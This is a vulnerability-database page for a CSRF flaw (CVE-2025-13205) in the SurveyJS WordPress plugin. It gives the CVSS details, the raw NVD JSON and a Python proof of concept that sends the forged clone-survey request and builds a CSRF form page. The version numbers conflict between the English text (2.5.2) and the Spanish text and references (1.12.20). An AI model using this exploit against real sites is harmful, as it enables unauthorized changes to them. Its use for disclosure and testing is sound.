Security Vulnerability Report
中文
CVE-2025-13205 CVSS 4.3 MEDIUM

CVE-2025-13205

Published: 2026-01-24 09:15:52
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.2. This is due to missing or incorrect nonce validation on the `SurveyJS_CloneSurvey` AJAX action. This makes it possible for unauthenticated attackers to duplicate surveys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SurveyJS WordPress Form Builder插件 <= 2.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13205 PoC - CSRF to Clone SurveyJS Survey # This PoC demonstrates the CSRF vulnerability in SurveyJS WordPress plugin <= 2.5.2 def clone_survey(target_url, survey_id, admin_cookie=None): """ Clone a survey via CSRF attack Args: target_url: Target WordPress site URL survey_id: ID of the survey to clone admin_cookie: Admin session cookie (if available) """ ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Construct the CSRF payload data = { 'action': 'SurveyJS_CloneSurvey', 'survey_id': survey_id, 'nonce': '' # No nonce required due to vulnerability } headers = { 'Content-Type': 'application/x-www-form-urlencoded', } if admin_cookie: headers['Cookie'] = admin_cookie try: response = requests.post(ajax_url, data=data, headers=headers, timeout=10) print(f"[+] Request sent to {ajax_url}") print(f"[+] Response Status: {response.status_code}") print(f"[+] Response: {response.text[:500]}") return response except requests.RequestException as e: print(f"[-] Error: {e}") return None def generate_csrf_html(target_url, survey_id): """ Generate HTML page with auto-submitting CSRF form For authorized security testing only """ html = f''' <!DOCTYPE html> <html> <head> <title>SurveyJS Clone CSRF PoC</title> </head> <body> <h1>CSRF PoC - SurveyJS Clone Survey</h1> <p>Click the button below to clone survey ID: {survey_id}</p> <form id="csrf_form" method="POST" action="{target_url}/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="SurveyJS_CloneSurvey"> <input type="hidden" name="survey_id" value="{survey_id}"> <button type="submit">Submit Request</button> </form> <script> // Auto-submit for demonstration // document.getElementById('csrf_form').submit(); </script> </body> </html> ''' return html if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-13205.py <target_url> <survey_id>") print("Example: python cve-2025-13205.py http://example.com 1") sys.exit(1) target = sys.argv[1] survey_id = sys.argv[2] print(f"[*] CVE-2025-13205 PoC - SurveyJS CSRF Vulnerability") print(f"[*] Target: {target}") print(f"[*] Survey ID: {survey_id}") clone_survey(target, survey_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13205", "sourceIdentifier": "[email protected]", "published": "2026-01-24T09:15:51.880", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.2. This is due to missing or incorrect nonce validation on the `SurveyJS_CloneSurvey` AJAX action. This makes it possible for unauthenticated attackers to duplicate surveys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin SurveyJS: Drag &amp; Drop WordPress Form Builder to create, style and embed multiple forms of any complexity para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 1.12.20, inclusive. Esto se debe a la validación de nonce faltante o incorrecta en la acción AJAX 'SurveyJS_CloneSurvey'. Esto hace posible que atacantes no autenticados dupliquen encuestas mediante una petición falsificada siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/surveyjs/tags/1.12.20/ajax_handlers/clone_survey.php#L8", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e1179303-fe7c-47f1-958c-2e4d2c574e4a?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.